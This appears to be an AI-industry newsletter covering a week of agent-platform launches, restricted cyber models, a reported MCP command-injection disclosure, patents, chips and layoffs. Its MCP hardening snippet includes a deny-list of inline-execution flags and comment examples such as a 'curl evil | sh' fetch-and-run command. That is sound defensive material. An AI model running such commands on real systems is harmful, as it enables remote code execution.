Every major AI lab shipped an agent operating system in one week.

Between April 14 and April 17, OpenAI put Codex on your desktop and a life sciences model in your lab. Anthropic dropped Opus 4.7 and Claude Design inside 24 hours. Google embedded subagents into Gemini CLI and published a new generative UI standard. Alibaba open-sourced an MoE with 262K native context that runs on Apple Silicon. xAI quietly rolled out a pixel-reading desktop agent. Perplexity shipped Personal Computer for Mac and its CEO said out loud what every lab was thinking: “A traditional operating system processes commands; an AI operating system focuses on goals.” Cadence launched a chip-design orchestrator that NVIDIA is already using internally. The Control Plane War we flagged in #008 stopped being positioning and started being product — all in 96 hours.

While that shipping frenzy was happening, OpenAI quietly matched Anthropic’s most controversial move from last week — but more openly. Security researchers dropped receipts proving the protocol most of those agents depend on has remote code execution by design across 200,000+ servers. Anthropic’s response: working as intended. A patent broker put a portfolio up for sale that reads directly onto every multi-agent framework in production. And a sneaker company rebranded as a GPU-rental startup, surged as much as 800% intraday, and added $127 million in market cap on zero operational history.

The model era is over. The workspace era is real. Here’s what matters.


⚡ The Agent OS War Went Public

Six labs. Five days. One thesis: models aren’t the product anymore.

If you count the releases, there were more than a dozen significant drops from six labs inside a single week. If you read the pattern, there was one: labs are competing on agent operating systems now, not on models. The workspace, runtime, memory, orchestration, and handoff layer is the frontier. Raw capability is table stakes.

OpenAI shipped three things in 48 hours. Codex for (almost) everything (April 16) added background computer use on macOS — multiple agents clicking and typing on your Mac in parallel while you keep working in other apps. Plus 90+ plugins, an in-app browser you can comment on, gpt-image-1.5 image generation, a memory preview that learns your preferences, and scheduled future work that can wake up days or weeks later. The Agents SDK update (April 15) added native sandbox execution, a model-native harness, and built-in support for Blaxel, Cloudflare, Daytona, E2B, Modal, Runloop, and Vercel. And GPT-Rosalind (April 16) is OpenAI’s first vertical frontier model — life sciences, gated access, with Amgen, Moderna, the Allen Institute, and Thermo Fisher Scientific as launch customers plus an existing collaboration with Los Alamos on protein and catalyst design. Access is gated through a Trusted Access Program for qualified US enterprise customers; during the preview, usage doesn’t consume tokens or credits for approved orgs.

Anthropic answered with back-to-back launches. Claude Opus 4.7 (April 16) hit 87.6% on SWE-bench Verified (up from 80.8%), tripled vision resolution to 3.75MP, added an xhigh effort level and task budgets, and held pricing at $5/$25 per million tokens. Claude Design (April 17) is the first product under a new “Anthropic Labs” sub-brand — prompt-to-prototype, reads your codebase to apply your design system automatically, hands off to Claude Code with one click. Brilliant reported 20+ prompts in Figma reduced to 2 prompts in Claude Design. Datadog compressed a week-long briefs/mockups cycle into a single conversation. Figma dropped about 6% and Adobe about 2.7% the day The Information leaked the news. Mike Krieger (Anthropic’s CPO) resigned from Figma’s board the same day.

Google shipped quietly but consistently. Gemini CLI v0.38.1 (April 16) made subagents public — Markdown-defined specialists with isolated context windows, @agent delegation syntax, parallel execution, and remote subagents via the A2A protocol. A2UI v0.9 (April 17) is a framework-agnostic standard for portable generative UI, with transport support across MCP, WebSockets, REST, and A2A. Neither made front-page headlines. Both are protocol plays that compound.
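
Google hasn't published a full spec for the Markdown subagent format in a form we can quote, so here's a plausible sketch of what one of those "Markdown-defined specialists" could look like, assuming a frontmatter-plus-instructions shape similar to Claude Code's agent files — the file name, field names, and tool list below are illustrative, not documented syntax:

```markdown
---
name: test-runner
description: Runs the test suite and triages failures. Delegate with @test-runner.
tools: run_shell_command, read_file
---

You are a test specialist. When delegated a task:
1. Run the project's test suite.
2. Summarize failures with file and line references.
3. Propose minimal fixes; do not apply them without confirmation.
```

The interesting part is the isolated context window: the specialist sees only its delegated task and its own instructions, not the parent conversation.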

Alibaba’s Qwen team open-sourced Qwen3.6-35B-A3B (April 16) — Apache 2.0, 35B total / 3B active MoE, 262K native context extensible to 1M tokens, targeted directly at agentic coding. Runs on Apple Silicon via MLX. You can pull it from Hugging Face and run it locally right now.

xAI quietly rolled out Grok Computer in private beta (April 13) — a pixel-reading desktop agent that drives any software, including legacy apps without APIs. Then it shipped Grok 4.3 beta (April 17) at $300/month behind the SuperGrok Heavy paywall, with a 2M-token context window (bigger than Claude’s 200K or GPT’s 128K). Grok’s memory story is still thin — the API is stateless unless you pass prior messages yourself, and consumer-app memory is partial at best. That’s the gap keeping Grok from being a serious daily driver for long-horizon work.
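
"Stateless" is worth making concrete: with a stateless chat API, memory is the caller's job, and every request must carry the full prior transcript. A minimal sketch of that pattern in Python — the `send` function here is a stand-in for any chat-completions-style client, and the fake backend exists only so the sketch runs without an API key; nothing below is real Grok API surface:

```python
from typing import Callable

Message = dict[str, str]

class StatelessChat:
    """Client-side memory for a stateless chat API: the full
    transcript is resent with every request."""

    def __init__(self, send: Callable[[list[Message]], str]):
        self.send = send          # stand-in for the real API call
        self.history: list[Message] = []

    def ask(self, user_text: str) -> str:
        self.history.append({"role": "user", "content": user_text})
        reply = self.send(self.history)   # entire transcript goes over the wire
        self.history.append({"role": "assistant", "content": reply})
        return reply

# Fake backend so the sketch is runnable without an API key:
# it just reports how many messages it was handed.
def fake_send(messages: list[Message]) -> str:
    return f"seen {len(messages)} messages"

chat = StatelessChat(fake_send)
chat.ask("Summarize my notes.")           # backend sees 1 message
print(chat.ask("Now make it shorter."))   # backend sees 3 messages
```

Every consumer app with "memory" is doing some version of this bookkeeping for you — which is why its absence is a product gap, not a model gap.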

Perplexity — not a frontier lab, but a frontier orchestrator — rolled out Personal Computer for Mac (April 16) to all Perplexity Max subscribers ($200/month) and waitlist members. Press both Command keys, activate by voice or text, and an agent runs across your local files, native apps, iMessage, Apple Mail, Calendar, and Comet browser. On a Mac mini it runs 24/7 in the background; start a task from your iPhone and it executes on your desktop using 2FA. CEO Aravind Srinivas, at the launch: “A traditional operating system processes commands; an AI operating system focuses on goals.” That’s not marketing. That’s a CEO stating the entire thesis of this section out loud, then shipping against it in the same week as every lab in the industry.

And at CadenceLIVE Silicon Valley (April 15), Cadence unveiled AgentStack — a head agent orchestrating specialized sub-agents across RTL, verification, physical design, custom/analog, and system-level workflows. NVIDIA is an early customer using it for its own chip design. Early deployments report 10x productivity gains.
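
None of these orchestrators are open source, but the head-agent pattern itself is simple to state: extract an intent, route to a specialist, return the result. A toy sketch of that loop — keyword matching stands in for the model-driven intent extraction a real product would use, and the sub-agents here are trivial placeholders:

```python
# Toy head agent: route a task to a specialized sub-agent by intent.
# Real systems replace the keyword match with model-driven intent
# extraction and run sub-agents in parallel with isolated contexts.

def verify_agent(task: str) -> str:
    return f"[verification] wrote assertions for: {task}"

def layout_agent(task: str) -> str:
    return f"[physical design] produced floorplan for: {task}"

SUBAGENTS = {
    "verify": verify_agent,
    "test": verify_agent,
    "layout": layout_agent,
    "floorplan": layout_agent,
}

def head_agent(task: str) -> str:
    """Dispatch to the first sub-agent whose trigger word appears."""
    lowered = task.lower()
    for keyword, agent in SUBAGENTS.items():
        if keyword in lowered:
            return agent(task)
    return f"[head] no specialist matched; handling directly: {task}"

print(head_agent("verify the ALU against the spec"))
```

The hard parts Cadence and the labs are actually selling — context isolation, parallel execution, handoff of intermediate artifacts — all live outside this dispatch loop.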

Here’s what actually matters for builders: If you’re evaluating where to commit your agent stack for the next 18 months, this week just changed the calculus. The Claude Design → Claude Code handoff bundle is real lock-in. So is OpenAI’s plugin ecosystem. Google’s protocol-first approach stays portable at the cost of fewer batteries-included features. Perplexity’s orchestrator-across-20-models play is the opposite bet — portability as a feature, at $200/month for a Mac mini you already own. You’re not picking a model anymore. You’re picking a development stack, a deployment substrate, and in some cases a company-wide commitment.

Hype vs. Reality: 8/10 — This is real infrastructure shipping, not vaporware. The lock-in is real, the security implications (keep reading) are real, and the iteration velocity is insane. Pick carefully.


🔫 OpenAI Played Anthropic’s Cyber Move — More Openly

GPT-5.4-Cyber went to thousands of vetted defenders. Mythos went to 50 hand-picked orgs.

Last week we covered Project Glasswing — Anthropic’s $100M cybersecurity coalition built around Claude Mythos Preview, handed to roughly 50 organizations including AWS, Apple, Microsoft, Google, NVIDIA, CrowdStrike, and JPMorgan. Tight coalition. Curated partners. Restricted rollout.

On April 14, OpenAI shipped GPT-5.4-Cyber through an expanded Trusted Access for Cyber (TAC) program. Same basic concept: a cyber-permissive variant with lower refusal boundaries for legitimate defensive work, plus binary reverse engineering capabilities that vanilla GPT-5.4 refuses. Different distribution strategy: thousands of verified individual defenders and hundreds of teams, with identity-verified signup at chatgpt.com/cyber.

Fouad Matin, OpenAI’s cyber researcher, at the launch briefing: “This is a team sport. No one should be in the business of picking winners and losers when it comes to cybersecurity.”

That’s a direct shot at Glasswing’s hand-picked coalition.

The distinction matters. Anthropic bet on curated partnerships with deep commitments. OpenAI bet on democratized-but-verified access — if you can prove you’re a defender, you can use it. Both approaches are legitimate. Only one matches the “don’t gatekeep the future” posture every lab claims to have.

Why it matters for builders: If you do security work — pentesting, vulnerability research, red-teaming, responsible disclosure — GPT-5.4-Cyber is the first frontier-class cyber model with a path to access that doesn’t require a Fortune 500 letterhead. Verify your identity. Apply. Get the model.

Hype vs. Reality: 7/10 — “More open” still means vetted; this isn’t a public API. But it’s a notably different philosophy from Glasswing, and it shipped exactly one week later. That’s not a coincidence.


🚨 Meanwhile, Security Researchers Called Anthropic’s Bluff

Project Glasswing was last week. MCP’s RCE-by-design was this week.

One week after Anthropic launched a $100M initiative to use Mythos for finding zero-days in other people’s software, security researchers at OX Security dropped what they’re calling “The Mother of All AI Supply Chains.”

The target: Anthropic’s Model Context Protocol. The finding: remote code execution by design.

200,000+

MCP server instances vulnerable to command injection across 150 million downloads and 10+ issued CVEs.

The MCP STDIO interface executes arbitrary OS commands. By design. Any developer using Anthropic’s official MCP SDK in Python, TypeScript, Java, or Rust inherits the exposure.

CVE-2026-30615 is a zero-click RCE on Windsurf — a victim visits a malicious webpage, commands execute locally, no interaction required. Cursor, VS Code, Claude Code, Gemini-CLI, GitHub Copilot, and OpenAI Codex all contain the same MCP STDIO code. OX Security ran proof-of-concept attacks on six live production platforms with real paying customers. They successfully “poisoned” 9 out of 11 MCP marketplaces by uploading a benign test payload.

OX disclosed the findings to Anthropic in November 2025 and spent months working through 30+ responsible disclosures. Anthropic’s response, repeatedly: “expected behavior.” The company updated its SECURITY.md to note that STDIO adapters should be “used with caution.” It declined all four architectural fixes OX proposed — manifest-only execution, command allowlisting, dangerous-mode opt-in flags, and signed marketplace verification.

Davi Ottenheimer at flyingpenguin summed it up: “Execute first, validate never.”

The contradiction is the story. You cannot build a $100M coalition to secure the world’s software with AI while refusing to apply the same “secure by default” thinking to the protocol every AI agent uses. Either MCP gets architecturally hardened, or Glasswing’s messaging collapses under its own receipts.

Why it matters for builders: If you run MCP servers — in Claude Code, Cursor, VS Code, or anywhere else — assume the STDIO layer is a remote code execution path unless you’ve explicitly sanitized it. Tactical checklist is in Quick Signals below.
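
A minimal sketch of what "explicitly sanitized" can mean in practice, assuming you control which server configs your client loads. The allowlist entries and flag set are illustrative, not a complete defense — the point is that a naive binary allowlist isn't enough, because runner flags can smuggle inline code execution through an "approved" binary:

```python
import shlex

# Binaries we're willing to spawn as MCP STDIO servers, and flags that
# turn an approved runner into an arbitrary-code launcher.
ALLOWED_COMMANDS = {"node", "python3", "uvx"}
DANGEROUS_FLAGS = {"-c", "-e", "--eval", "-p"}  # e.g. npx -c, node -e, python -c

def vet_stdio_command(command_line: str) -> list[str]:
    """Reject an MCP server command unless the binary is allowlisted
    and no argument smuggles in inline code execution."""
    argv = shlex.split(command_line)
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"binary not allowlisted: {argv[0]}")
    smuggled = DANGEROUS_FLAGS.intersection(argv[1:])
    if smuggled:
        raise ValueError(f"inline-exec flag rejected: {sorted(smuggled)}")
    return argv  # safe to hand to a process spawner — never to a shell

vet_stdio_command("python3 -m my_mcp_server")       # passes
# vet_stdio_command("npx -c 'curl evil | sh'")      # raises: binary not allowlisted
# vet_stdio_command("python3 -c 'import os;...'")   # raises: inline-exec flag rejected
```

This only covers the bypass class the checklist calls out; real hardening also needs untrusted-config isolation, path canonicalization, and environment scrubbing.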

Hype vs. Reality: 9/10 on the research. Real technical work, responsible disclosure, verifiable CVEs. Anthropic’s response makes this worse, not better.


⚖️ The Patent Trolls Just Showed Up

Nobody’s talking about this yet. Everyone building agents should.

On April 16, while every AI lab was shipping agent infrastructure, patent broker Vitek IP put a portfolio up for sale. Two US patents, described in Vitek’s listing as “originally developed by Bao Tran, a Silicon Valley tech futurist” — though USPTO records show at least one of the patents is assigned to a separate entity, Proactive AI Lab, Inc., with a roster of named inventors that doesn’t include Tran. The broker’s “originally developed by” framing is doing some work. Either way, the patents cover: multi-agent orchestration systems, orchestrator agents coordinating specialized sub-agents, natural language intent extraction, dynamic task routing, and a secure AI assistant using a locally deployed LLM with encrypted vector databases and retrieval-augmented generation.

That’s a plain-English description of OpenAI’s Agents SDK and Anthropic’s Claude Managed Agents.

Per Vitek’s listing, the orchestration patent has 19 years of life remaining. The privacy/RAG patent has 18. Vitek says it has “developed claim charts outlining the demonstrated use and value of the patented technology across leading AI platforms.” The firm intends to finalize a transaction in Q3 2026.

Translation: they’re ready to send cease-and-desist letters the minute a buyer signs. If a patent troll acquires these, every multi-agent framework in production becomes a licensing target. The Agents SDK you just read about. Every MCP orchestrator. Every production LangChain deployment. Every startup building on CrewAI, Multica, or OpenClaw.

This isn’t theoretical. Vitek has a track record — it brokered Data Culpa’s data pipeline portfolio in February, a Matthew Carroll AR content portfolio in March, and VoxSmart’s VoIP portfolio on April 15. Claim charts are how you prep for litigation, not just licensing.

Why it matters for builders: If you’re building on multi-agent frameworks for a VC-backed startup, get your counsel watching this portfolio’s sale. If you’re an enterprise buyer, start documenting your architectural independence from the specific claims in those patents now — not after a demand letter arrives. The tech matured; the lawyers noticed.

Hype vs. Reality: 8/10 — This is a real, credible threat. The fact that nobody’s talking about it doesn’t mean it won’t matter in six months.


🏗️ The Custom Silicon Race Got Public

Cerebras filed its S-1. Meta committed more than 1GW to Broadcom. The Nvidia hedge is no longer theoretical.

Two Nvidia-alternative plays shipped the same week.

Cerebras filed its S-1 on April 17, targeting a Nasdaq listing under CBRS, with Morgan Stanley, Citigroup, Barclays, and UBS leading. The numbers in the filing: 2025 revenue of $510M (up 76% from $290.3M), net income of $87.9M (versus a $485M loss in 2024), and $24.6B in remaining performance obligations, including the $20B+ OpenAI contract for 250MW/year across 2026–28 with an option for another 1.25GW through 2030. Reports around the filing put the target valuation in the $22–25B range with an approximately $2B raise, though share count and pricing aren’t set in the filing itself. The WSE-3 chip is 57x the physical size of an H100 — 4 trillion transistors, 900,000 cores.

The twist: OpenAI’s deep financial entanglement with Cerebras — reportedly including warrants on non-voting shares and a nine-figure loan — turns this IPO into a feedback loop. Last week’s Oracle cuts were the free-cash-flow side of AI’s capex story. Cerebras’s S-1 is the raise-real-money side.

Meta extended its custom silicon deal with Broadcom through 2029 on April 14 — an initial commitment of more than 1GW of compute capacity (enough to power roughly 750,000 US homes), described as the first phase of a “sustained, multi-gigawatt rollout.” MTIA chips moving to 2nm process, Broadcom’s XPU platform for design/packaging/networking. Broadcom CEO Hock Tan is leaving Meta’s board for a strategic advisory role focused on the custom silicon roadmap.

Stack it up: Meta’s committed up to 6GW of AMD Instinct GPUs, millions of Nvidia chips, custom Arm silicon, and $115–135B in 2026 AI capex. A pattern emerges. The hyperscalers don’t want to be Nvidia’s customers forever. They want to be their own silicon companies.

Why it matters for builders: GPU pricing is about to get weird. If hyperscalers absorb 20–30% of inference onto custom silicon by 2027–28, spot GPU pricing in cloud markets could drop. Or it could spike if the custom chips miss targets and Nvidia demand rises. Either way, multi-year GPU forward commitments right now carry more downside than they did six months ago.


👀 A Shoe Company Became a GPU Startup

NASDAQ:BIRD → NASDAQ:NBRD. 800% intraday. Zero AI infrastructure experience.

On April 15, Allbirds — the certified-B-Corp wool sneaker brand once valued at $4B — announced it was selling its footwear assets to American Exchange Group for $39M, executing a $50M convertible financing facility with an unnamed institutional investor, and rebranding as NewBird AI. The pivot: “GPU-as-a-Service and AI-native cloud solutions.”

The stock surged as much as 800% intraday, closed up 582%, and added roughly $127M in market cap — on zero operational history in AI compute, no announced customers, no disclosed team, and a $50M raise that’s a rounding error against CoreWeave’s or Lambda Labs’ scale. The company also abandoned its founding environmental commitments.

Steve Sosnick, chief strategist at Interactive Brokers, on CNN Business: “A 6x or 7x move for a company that is literally ditching its prior business model for one in which it has no demonstrated expertise says quite a bit about market froth and investor willingness to chase moves.”

Let’s be real: this is Long Island Iced Tea → Long Blockchain Corp from 2017, recycled for the AI bubble. A shell company, a ticker change, a press release invoking the magic words, and a retail pile-on. The Allbirds sitting in Silicon Valley closets didn’t turn into H200s overnight.

Hype vs. Reality: 2/10 — If you’re buying this stock because of the rebrand, you’re the exit liquidity. The “market cap went up $127M” part is real. The “GPU company now” part is aspirational at best.


📡 Quick Signals

GLM-5.1 cracked the Code Arena top 3. Z.ai’s open-source, MIT-licensed GLM-5.1 posted 1530 Elo on Code Arena on April 10 — third globally, behind only Claude Opus 4.6-thinking and 4.6, ahead of every GPT and Gemini model. Trained on 100,000 Huawei Ascend 910B chips. Zero Nvidia involvement. First open-weight model to crack the top 3 on a human-voted coding leaderboard.

Microsoft’s April Patch Tuesday included a wormable Windows RCE. CVE-2026-33827 is a remote, unauthenticated TCP/IP RCE affecting systems with IPv6 + IPSec enabled. No user interaction required. Race condition, so reliability varies, but this is worm material. Patch now if you’re on IPv6. Separately, CVE-2026-32201 is a SharePoint spoofing vulnerability under active exploitation.

Stanford’s 2026 AI Index dropped macro receipts. The biggest number: AI agent task success on OSWorld — the benchmark that tests agents on real computer tasks across operating systems — jumped from 12% to 66.3% in a single year, within 6 points of human performance. SWE-bench Verified went from ~60% to near 100%. The U.S.–China model gap narrowed to 2.7%. Documented AI incidents rose to 362 in 2025 (up from 233). The agent OS thesis has the data now.

Snap laid off 1,000 people and said the quiet part out loud. On April 15, CEO Evan Spiegel cut 16% of full-time staff and closed 300 open roles, citing “rapid advancements in artificial intelligence” and noting that 65% of new Snap code is now AI-generated. $500M in annualized cost savings by H2 2026, $95–130M in restructuring charges, activist investor Irenic Capital (2.5% stake) pushing for more cuts. Stock popped 7–11% on the news. Stack this with Oracle’s cuts from last week: the “AI makes us more productive, so we need fewer people” layoff wave is no longer a rumor — it’s a stated corporate strategy, and it’s disproportionately hitting software engineers and customer service teams.

London just became the #2 AI capital. OpenAI signed a lease on April 13 for an 88,500 sq ft King’s Cross office with capacity for 500+ (more than double its current UK headcount). Anthropic answered on April 16 with a 158,000 sq ft Knowledge Quarter space for 800 people — four times its current London team. Both moves came after the UK government courted each company hard. Anthropic’s expansion lands in the same neighborhood as DeepMind, Meta, and OpenAI, and deepens its relationship with the UK AI Security Institute, which just published a risk evaluation of Claude Mythos Preview. Context: Anthropic was designated a “supply chain risk” by the Pentagon in March. OpenAI paused its UK Stargate data center project over power costs on April 10. Both are now betting their largest non-US research presence on London.

MCP tactical checklist (from OX Security’s recommendations): Block public IP access to MCP-connected services. Treat external MCP configuration input as untrusted — no user input should reach StdioServerParameters. Install only from verified sources like the official GitHub MCP Registry. Audit command allowlists for bypass vectors like npx -c. Patch Anthropic’s official MCP SDK the moment a hardening update ships — and pressure them to ship one.


🎯 The Playbook

Your moves this week

  1. Pick your agent OS lane now, knowing it’s lock-in. Codex + OpenAI’s plugin ecosystem, Claude Design + Claude Code handoff, Gemini CLI with remote subagents, Perplexity’s orchestrator-across-20-models Mac app, or self-host on Qwen3.6. Each is a commitment. The open-weight path costs more engineering effort but stays portable. Perplexity is the hedge: orchestration without training a model of their own. The closed paths buy velocity at the price of vendor dependency.
  2. Apply for Trusted Access for Cyber if you do security work. chatgpt.com/cyber. Identity verification, not a Fortune 500 letterhead. Binary reverse engineering plus lower refusal on legitimate defensive work is genuinely useful capability.
  3. Audit every MCP server you run. Assume the STDIO layer is a remote code execution path. Block public IP access, sanitize configuration input, install only from verified registries. If you’re running Claude Code, Cursor, Windsurf, VS Code, or Gemini-CLI, patch MCP dependencies as soon as hardening updates ship.
  4. Put “AI agent orchestration patents” on your legal team’s watchlist. The Vitek IP portfolio hasn’t sold yet. When it does, demand letters will be the buyer’s first move, not their last. Start documenting architectural independence from claims like “orchestrator routing to containerized specialized agents based on real-time metrics.”
  5. Pull Qwen3.6-35B-A3B and run it locally. Apache 2.0, 262K native context, runs on Apple Silicon via MLX. Worth a weekend of evaluation even if you don’t plan to deploy. The gap between open-weight and frontier is now measured in single percentage points on coding benchmarks.
  6. Reassess your GPU reservations before June. Meta committing 1GW+ to Broadcom, Cerebras filing S-1, and hyperscalers absorbing 20–30% of inference onto custom silicon by 2027–28 means current GPU forward contracts may not age well. Shorter reservations, more optionality, and at least one non-cloud backup plan.
  7. If you lead a team, start measuring AI-assisted output now. Snap just publicly attributed layoffs to AI. Oracle did the same. Whether you like that framing or not, the boards and activist investors pushing for it are the same boards and activist investors who will push your CEO next. Measure what your team ships with and without AI, document the delta, and get ahead of the conversation before it becomes a spreadsheet with your headcount on it.

🔥 What’s Viral Right Now

Codex operating your Mac in the background — the demo of Codex spinning up three agents to click through three apps while the user kept working has been the most-shared AI clip of the week. OpenAI’s answer to Anthropic’s Claude Cowork is more visible and more immediate.

Claude Design vs. Figma — the stock charts (Figma down about 6%, Adobe about 2.7% on the day of The Information’s leak) are everywhere. @aakashgupta on X: “A product that doesn’t exist yet just vaporized billions.” The product now exists.

The MCP “by design” response — OX Security’s thread on the Anthropic disclosure process has been circulating across security Twitter for four days. The screenshots of Anthropic’s “expected behavior” replies are the part security folks are sharing. Glasswing’s credibility is taking its first real hit.

BIRD → NBRD — the Allbirds chart is already a meme. CNN Business’s headline (“Allbirds shares soar on a very 2026 pivot to AI”) is getting recycled in every bubble thread on X.

“A Mac mini, but it’s your employee” — Perplexity’s Personal Computer launch got traction in the “AI as digital coworker” frame. Srinivas’s line about goals vs. commands is getting reposted across product Twitter. The $200/month price tag is getting the opposite treatment.


Stay building. 🛠️

— Matt